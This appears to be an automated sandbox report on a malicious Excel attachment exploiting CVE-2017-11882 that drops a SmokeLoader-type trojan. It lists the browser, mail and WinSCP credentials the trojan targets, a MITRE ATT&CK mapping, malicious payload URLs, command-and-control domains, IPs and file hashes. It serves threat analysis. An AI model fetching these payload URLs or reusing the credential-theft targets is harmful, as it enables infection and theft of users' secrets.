Source: Yara match	File source: 00000006.00000002.1061965505.0000000000341000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1198613014.00000000028C1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1147182548.00000000002A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1146958938.0000000000280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\ZQIXMVQGAH

Source: C:\Windows\SysWOW64\explorer.exe

Directory queried: number of queries: 1042

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 0000001A.00000002.1194343464.0000000000081000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1194283601.0000000000061000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3532, type: MEMORYSTR
Source: Yara match	File source: 00000006.00000002.1061822794.0000000000300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1061965505.0000000000341000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1198613014.00000000028C1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1147182548.00000000002A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1146958938.0000000000280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	11 Scripting	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	35 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	512 Process Injection	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	11 Data from Local System	Exfiltration Over Bluetooth	2 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	33 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	11 Scripting	Security Account Manager	22 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	31 Obfuscated Files or Information	NTDS	17 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	124 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	2 Software Packing	LSA Secrets	431 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 DLL Side-Loading	Cached Domain Credentials	121 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	121 Masquerading	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	121 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	512 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Hidden Files and Directories	Network Sniffing	1 Remote System Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PO-112030087.xls	38%	ReversingLabs	Document-Excel.Exploit.CVE-2017-11882
PO-112030087.xls	51%	Virustotal		Browse
PO-112030087.xls	100%	Avira	EXP/CVE-2017-11882.Gen

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\rirjijj	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	36%	ReversingLabs	Win32.Trojan.InjectorX
C:\Users\user\AppData\Roaming\rirjijj	36%	ReversingLabs	Win32.Trojan.InjectorX
C:\Users\Public\vbc.exe	36%	ReversingLabs	Win32.Trojan.InjectorX

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.mozilla.com0	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://wellformedweb.org/CommentAPI/	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://java.sun.com	0%	URL Reputation	safe
http://23.95.122.250/24/vbc.exek	100%	Avira URL Cloud	malware
http://23.95.122.250/24/vbc.exej	100%	Avira URL Cloud	malware
http://localizability/practices/XML.asp	0%	Avira URL Cloud	safe
http://23.95.122.250/24/vbc.exeC:	100%	Avira URL Cloud	malware
http://gekbvbme.com/	0%	Avira URL Cloud	safe
http://23.95.122.250/24/vbc.exe	100%	Avira URL Cloud	malware
http://computername/printers/printername/.printer	0%	Avira URL Cloud	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe
http://23.95.122.250/24/vbc.exehhC:	100%	Avira URL Cloud	malware
http://dropbuyinc.ga/(	100%	Avira URL Cloud	malware
http://gekbvbme.com/application/x-www-form-urlencodedMozilla/5.0	0%	Avira URL Cloud	safe
http://dropbuyinc.ga/%	100%	Avira URL Cloud	malware
http://localizability/practices/XMLConfiguration.asp	0%	Avira URL Cloud	safe
http://dropbuyinc.ga/	100%	Avira URL Cloud	malware
http://omacrestinc.ga/	0%	Avira URL Cloud	safe
http://www.hyperionics.com0	0%	Avira URL Cloud	safe
http://dropbuyinc.ga/Mozilla/5.0	100%	Avira URL Cloud	malware
http://dropbuyinc.ga/application/x-www-form-urlencodedMozilla/5.0	100%	Avira URL Cloud	malware
http://23.95.122.250/24/vbc.exeb	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
dropbuyinc.ga	23.230.13.96	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://23.95.122.250/24/vbc.exe	true	Avira URL Cloud: malware	unknown
http://dropbuyinc.ga/	true	Avira URL Cloud: malware	unknown
http://omacrestinc.ga/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	explorer.exe, 00000012.00000003.1147507743.000000000033C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://23.95.122.250/24/vbc.exek	EQNEDT32.EXE, 00000010.00000002.1128105028.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.msnbc.com/news/ticker.txt	explorer.exe, 00000009.00000002.1200177278.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	false		high
http://23.95.122.250/24/vbc.exej	EQNEDT32.EXE, 00000002.00000002.975408347.0000000003680000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000010.00000002.1130135860.0000000003700000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	explorer.exe, 00000012.00000003.1147507743.000000000033C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://localizability/practices/XML.asp	explorer.exe, 00000009.00000000.1011787841.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://23.95.122.250/24/vbc.exeC:	EQNEDT32.EXE, 00000010.00000002.1128105028.000000000061C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.iis.fhg.de/audioPA	explorer.exe, 00000009.00000002.1206641857.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.piriform.com/ccleanerq	explorer.exe, 00000009.00000002.1198869803.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1007179652.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.mozilla.com0	explorer.exe, 00000009.00000002.1214032258.0000000004DE8000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1039948841.0000000004DE8000.00000004.00000010.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://gekbvbme.com/	explorer.exe, 00000009.00000002.1215094567.00000000084D2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://treyresearch.net	explorer.exe, 00000009.00000002.1206641857.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.icra.org/vocabulary/.	explorer.exe, 00000009.00000000.1011787841.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	EQNEDT32.EXE, 00000002.00000002.975766238.0000000005200000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1215833145.0000000008899000.00000004.00000001.00020000.00000000.sdmp, EQNEDT32.EXE, 00000010.00000003.1124912321.0000000004E69000.00000004.00000020.00020000.00000000.sdmp	false		high
http://investor.msn.com/	explorer.exe, 00000009.00000002.1200177278.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	false		high
http://computername/printers/printername/.printer	explorer.exe, 00000009.00000002.1206641857.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://23.95.122.250/24/vbc.exehhC:	EQNEDT32.EXE, 00000002.00000002.973874573.000000000056F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000010.00000002.1128105028.00000000005CF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.%s.comPA	explorer.exe, 00000009.00000000.996261138.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	low
http://www.autoitscript.com/autoit3	explorer.exe, 00000009.00000000.990983488.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1195305052.0000000000335000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.piriform.com/ccleanerv	explorer.exe, 00000009.00000002.1202387555.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1027064494.0000000004385000.00000004.00000001.00020000.00000000.sdmp	false		high
http://servername/isapibackend.dll	explorer.exe, 00000009.00000000.1040644007.0000000006450000.00000002.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.windows.com/pctv.	explorer.exe, 00000009.00000002.1200177278.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	false		high
http://investor.msn.com	explorer.exe, 00000009.00000002.1200177278.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	false		high
http://dropbuyinc.ga/application/x-www-form-urlencodedMozilla/5.0	explorer.exe, 00000012.00000002.1151222846.0000000000330000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://wellformedweb.org/CommentAPI/	explorer.exe, 00000009.00000002.1206641857.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://dropbuyinc.ga/(	explorer.exe, 00000009.00000002.1195305052.00000000003A6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://gekbvbme.com/application/x-www-form-urlencodedMozilla/5.0	explorer.exe, 00000009.00000002.1215094567.00000000084D2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dropbuyinc.ga/%	explorer.exe, 00000012.00000002.1151222846.00000000002F4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ocsp.thawte.com0	EQNEDT32.EXE, 00000002.00000002.975766238.0000000005200000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1215833145.0000000008899000.00000004.00000001.00020000.00000000.sdmp, EQNEDT32.EXE, 00000010.00000003.1124912321.0000000004E69000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.piriform.com/ccleaner1SPS0	explorer.exe, 00000009.00000000.1055248156.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1215268236.0000000008611000.00000004.00000001.00020000.00000000.sdmp	false		high
http://localizability/practices/XMLConfiguration.asp	explorer.exe, 00000009.00000000.1011787841.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	explorer.exe, 00000012.00000003.1147507743.000000000033C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	explorer.exe, 00000012.00000003.1147507743.000000000033C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	explorer.exe, 00000009.00000000.1011787841.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.hotmail.com/oe	explorer.exe, 00000009.00000002.1200177278.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	false		high
http://dropbuyinc.ga/Mozilla/5.0	explorer.exe, 00000012.00000002.1151222846.00000000002D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.1129567646.000000000041E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1133426014.0000000000274000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.1194849138.0000000000284000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.1194794458.00000000003EE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1194906622.0000000000574000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1194578290.00000000003AE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.1194757561.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1194727829.000000000026E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/favicon.ico	explorer.exe, 00000012.00000003.1147507743.000000000033C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	explorer.exe, 00000009.00000000.1011787841.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	explorer.exe, 00000012.00000003.1147507743.000000000033C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://java.sun.com	explorer.exe, 00000009.00000000.990983488.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1195305052.0000000000335000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	explorer.exe, 00000009.00000000.996261138.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 00000009.00000000.1055055001.0000000008521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1215161680.0000000008521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1215745549.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1055762169.0000000008807000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.hyperionics.com0	EQNEDT32.EXE, 00000002.00000002.973874573.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.972954865.0000000005201000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1215833145.0000000008899000.00000004.00000001.00020000.00000000.sdmp, EQNEDT32.EXE, 00000010.00000003.1124912321.0000000004E69000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.piriform.com/ccleaner	explorer.exe, 00000009.00000000.1054879390.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1198869803.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1055762169.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1215268236.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1007179652.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp	false		high
https://support.mozilla.org	explorer.exe, 00000009.00000000.990983488.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1195305052.0000000000335000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	explorer.exe, 00000012.00000003.1147507743.000000000033C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://23.95.122.250/24/vbc.exeb	EQNEDT32.EXE, 00000010.00000002.1128105028.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	explorer.exe, 00000012.00000003.1147507743.000000000033C000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.95.122.250	unknown	United States		36352	AS-COLOCROSSINGUS	true
23.230.13.96	dropbuyinc.ga	United States		18779	EGIHOSTINGUS	false

Private

IP
192.168.2.255

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	867360
Start date and time:	2023-05-16 12:55:09 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	PO-112030087.xls
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winXLS@52/56@6/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 52.7% (good quality ratio 36%) Quality average: 45.1% Quality standard deviation: 37.2%
HCA Information:	Successful, ratio: 99% Number of executed functions: 123 Number of non-executed functions: 81
Cookbook Comments:	Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.36.224.131, 2.21.22.155, 2.21.22.179
Excluded domains from analysis (whitelisted): ssl.adobe.com.edgekey.net, armmf.adobe.com, e4578.dscb.akamaiedge.net, acroipm2.adobe.com.edgesuite.net, a122.dscd.akamai.net, acroipm2.adobe.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:55:47	API Interceptor	147x Sleep call for process: EQNEDT32.EXE modified
12:55:52	API Interceptor	8x Sleep call for process: vbc.exe modified
12:55:53	API Interceptor	477x Sleep call for process: AcroRd32.exe modified
12:56:00	API Interceptor	61x Sleep call for process: RdrCEF.exe modified
12:56:00	API Interceptor	2206x Sleep call for process: explorer.exe modified
12:56:54	Task Scheduler	Run new task: Firefox Default Browser Agent BFFCA5655D11395F path: C:\Users\user\AppData\Roaming\rirjijj
12:56:55	API Interceptor	261x Sleep call for process: taskeng.exe modified
12:57:04	API Interceptor	1x Sleep call for process: rirjijj modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_1

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	modified
Size (bytes):	270336
Entropy (8bit):	0.0019461952142306594
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zEiltKl:/M/xT02z1c
MD5:	844EE95B0B25198D3BC92954A6BF3A81
SHA1:	081C894D70ACFF8837575E54594FE4F7ABA746DA
SHA-256:	D1461B0E4FCC1D4CD3BE1FB7E989B78D8338F6A0A2EEBD759B41284447792F70
SHA-512:	0A80ABB7EC01E7BA1E7E8F453971E2BE86A9534B66ED0E71BD6D93F4AEFFBF15B0100F5E732BC024C83FF24157A3A6176D297D9B05EF8CE28A17FC0AAC8AF2A1
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.174745305886461
Encrypted:	false
SSDEEP:	6:kC9VWGq2PP2nKuAl9OmbnIFUtv9VWPZmwd9VWYsW/zkwOP2nKuAl9OmbjLJ:kC3WGvWHAahFUtv3WP/d3WY757HAaSJ
MD5:	784CA2F1554DB57858B79C4C07C07044
SHA1:	27F039CAE5F2FF1D37E9078EE8EFD826247A545E
SHA-256:	DAF8FC7D04A0C613343EC26E90AAF553803F0C0C50FFF097CDFE810C8A58A9E5
SHA-512:	C131D28730899A0D3DF74BA222640B510FC9B263812F5D120211BC9B43CFD00F70B139F99B0E8FB7A23420392CD3F358BFF1C947D964B5F7A96526660D8963B0
Malicious:	false
Reputation:	unknown
Preview:	2023/05/16-12:56:03.790 3320 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2023/05/16-12:56:03.800 3320 Recovering log #3.2023/05/16-12:56:03.809 3320 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.174745305886461
Encrypted:	false
SSDEEP:	6:kC9VWGq2PP2nKuAl9OmbnIFUtv9VWPZmwd9VWYsW/zkwOP2nKuAl9OmbjLJ:kC3WGvWHAahFUtv3WP/d3WY757HAaSJ
MD5:	784CA2F1554DB57858B79C4C07C07044
SHA1:	27F039CAE5F2FF1D37E9078EE8EFD826247A545E
SHA-256:	DAF8FC7D04A0C613343EC26E90AAF553803F0C0C50FFF097CDFE810C8A58A9E5
